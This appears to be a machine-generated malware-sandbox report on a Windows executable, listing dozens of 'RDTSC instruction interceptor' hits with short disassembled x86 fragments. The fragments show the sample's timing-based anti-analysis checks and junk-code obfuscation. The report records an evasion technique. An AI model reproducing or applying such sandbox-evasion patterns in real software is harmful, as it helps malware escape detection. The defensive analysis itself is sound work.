                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9D06A second address: F9D070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9D19B second address: F9D19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9D2D0 second address: F9D2E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D092h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9D2E6 second address: F9D2F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F36B8869BF6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9D9A7 second address: F9D9AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9D9AD second address: F9D9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F36B8869BF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9D9B8 second address: F9D9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007F36B8D8D098h 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F36B8D8D086h 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9D9CE second address: F9DA44 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36B8869BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, eax 0x0000000d call 00007F36B8869BFEh 0x00000012 mov dword ptr [ebp+122D29E2h], ecx 0x00000018 pop esi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F36B8869BF8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 mov si, di 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007F36B8869BF8h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 xchg eax, ebx 0x00000055 jl 00007F36B8869C04h 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9DA44 second address: F9DA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9DA48 second address: F9DA59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F36B8869BF8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9E1F8 second address: F9E201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9F441 second address: F9F4A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F36B8869BF8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 jmp 00007F36B8869BFAh 0x0000002b push 00000000h 0x0000002d pushad 0x0000002e mov dl, al 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F36B8869C03h 0x00000039 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9FEE2 second address: F9FEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9FEE8 second address: F9FEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9FEED second address: F9FF6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jno 00007F36B8D8D086h 0x00000012 jmp 00007F36B8D8D08Ah 0x00000017 popad 0x00000018 pop ecx 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F36B8D8D088h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jmp 00007F36B8D8D08Bh 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+12454375h], ecx 0x00000041 push 00000000h 0x00000043 xor di, 648Ah 0x00000048 xchg eax, ebx 0x00000049 jmp 00007F36B8D8D08Dh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F36B8D8D08Bh 0x00000056 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9FF6F second address: F9FF74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA08FF second address: FA0904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA0904 second address: FA0993 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F36B8869BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e jmp 00007F36B8869C05h 0x00000013 pop ecx 0x00000014 nop 0x00000015 jc 00007F36B8869BFCh 0x0000001b mov edi, dword ptr [ebp+122D1AC3h] 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F36B8869BF8h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000014h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F36B8869BF8h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Bh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 mov edi, dword ptr [ebp+122D2A57h] 0x0000005f push eax 0x00000060 jbe 00007F36B8869C0Eh 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F36B8869BFCh 0x0000006d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA14FD second address: FA1522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F36B8D8D08Ah 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA2092 second address: FA209C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36B8869BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA1E3F second address: FA1E4E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA209C second address: FA2104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F36B8869BF8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 jc 00007F36B8869BFCh 0x00000027 sub dword ptr [ebp+12456E06h], esi 0x0000002d push 00000000h 0x0000002f jmp 00007F36B8869C00h 0x00000034 jmp 00007F36B8869C00h 0x00000039 push 00000000h 0x0000003b mov esi, dword ptr [ebp+12456133h] 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA2104 second address: FA210A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA210A second address: FA210F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA210F second address: FA211D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA2CCB second address: FA2D08 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F36B8869C06h 0x00000008 jmp 00007F36B8869C00h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F36B8869C09h 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F36B8869BF6h 0x0000001e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA2D08 second address: FA2D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F36B8D8D088h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA2D3E second address: FA2D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA2D46 second address: FA2D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA55A0 second address: FA55C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36B8869C04h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA5B6B second address: FA5B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F36B8D8D086h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA5B79 second address: FA5BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, 6764C4B4h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F36B8869BF8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e xor ebx, 2C6B0F7Eh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F36B8869BF8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov ebx, dword ptr [ebp+122D2C33h] 0x00000056 mov ebx, esi 0x00000058 push eax 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA5BFA second address: FA5BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA6BF5 second address: FA6C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA7C46 second address: FA7C69 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36B8D8D091h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F36B8D8D08Bh 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FA6DE4 second address: FA6DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FABD17 second address: FABD2C instructions: 0x00000000 rdtsc 0x00000002 je 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FABD2C second address: FABD41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FACDFB second address: FACE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FACE00 second address: FACE05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FACEB8 second address: FACEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FAEFAF second address: FAEFD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F36B8869BFFh 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB0EC1 second address: FB0ED2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FAEFD8 second address: FAEFE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FADE2F second address: FADEC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b nop 0x0000000c mov edi, 5AABC1D4h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov ebx, 70E6863Ah 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F36B8D8D088h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov di, 0E92h 0x00000042 mov eax, dword ptr [ebp+122D0715h] 0x00000048 push 00000000h 0x0000004a push eax 0x0000004b call 00007F36B8D8D088h 0x00000050 pop eax 0x00000051 mov dword ptr [esp+04h], eax 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc eax 0x0000005e push eax 0x0000005f ret 0x00000060 pop eax 0x00000061 ret 0x00000062 jmp 00007F36B8D8D099h 0x00000067 push FFFFFFFFh 0x00000069 xor dword ptr [ebp+122D20D3h], ecx 0x0000006f nop 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 push esi 0x00000074 pop esi 0x00000075 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB2E97 second address: FB2EC5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36B8869BFAh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e je 00007F36B8869BF8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F36B8869C01h 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB5020 second address: FB5024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB5024 second address: FB506C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F36B8869BF6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F36B8869C02h 0x00000012 nop 0x00000013 pushad 0x00000014 mov ah, 85h 0x00000016 mov dword ptr [ebp+122D3068h], eax 0x0000001c popad 0x0000001d push 00000000h 0x0000001f mov ebx, 626EAB02h 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D1DBFh], edi 0x0000002c xchg eax, esi 0x0000002d jbe 00007F36B8869C08h 0x00000033 push eax 0x00000034 push edx 0x00000035 jng 00007F36B8869BF6h 0x0000003b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB506C second address: FB5081 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jbe 00007F36B8D8D086h 0x00000014 pop ebx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB52CB second address: FB52CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB729A second address: FB729E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB729E second address: FB72A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB84F4 second address: FB84F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB84F8 second address: FB8556 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F36B8869BFEh 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F36B8869BF6h 0x00000016 jng 00007F36B8869C1Ah 0x0000001c jmp 00007F36B8869C01h 0x00000021 jmp 00007F36B8869C03h 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007F36B8869BF6h 0x0000002e jmp 00007F36B8869C06h 0x00000033 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FB8556 second address: FB8567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FBE3AD second address: FBE3F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFEh 0x00000007 pushad 0x00000008 ja 00007F36B8869BF6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F36B8869C01h 0x0000001a jmp 00007F36B8869C08h 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC2A47 second address: FC2A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC2B15 second address: FC2B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC75FA second address: FC7600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC7600 second address: FC7608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC7D55 second address: FC7DC2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F36B8D8D086h 0x00000008 jmp 00007F36B8D8D093h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F36B8D8D097h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jp 00007F36B8D8D086h 0x0000001e push edi 0x0000001f pop edi 0x00000020 jp 00007F36B8D8D086h 0x00000026 js 00007F36B8D8D086h 0x0000002c popad 0x0000002d jc 00007F36B8D8D0A0h 0x00000033 jmp 00007F36B8D8D098h 0x00000038 push edx 0x00000039 pop edx 0x0000003a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC7F27 second address: FC7F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC7F2B second address: FC7F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC7F2F second address: FC7F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36B8869C01h 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC8353 second address: FC8359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC8359 second address: FC83AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F36B8869C0Fh 0x0000000c jne 00007F36B8869C02h 0x00000012 jng 00007F36B8869BF6h 0x00000018 ja 00007F36B8869BF6h 0x0000001e popad 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F36B8869C06h 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC86A4 second address: FC86B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F36B8D8D086h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC87FB second address: FC8810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push ecx 0x0000000d jl 00007F36B8869C02h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
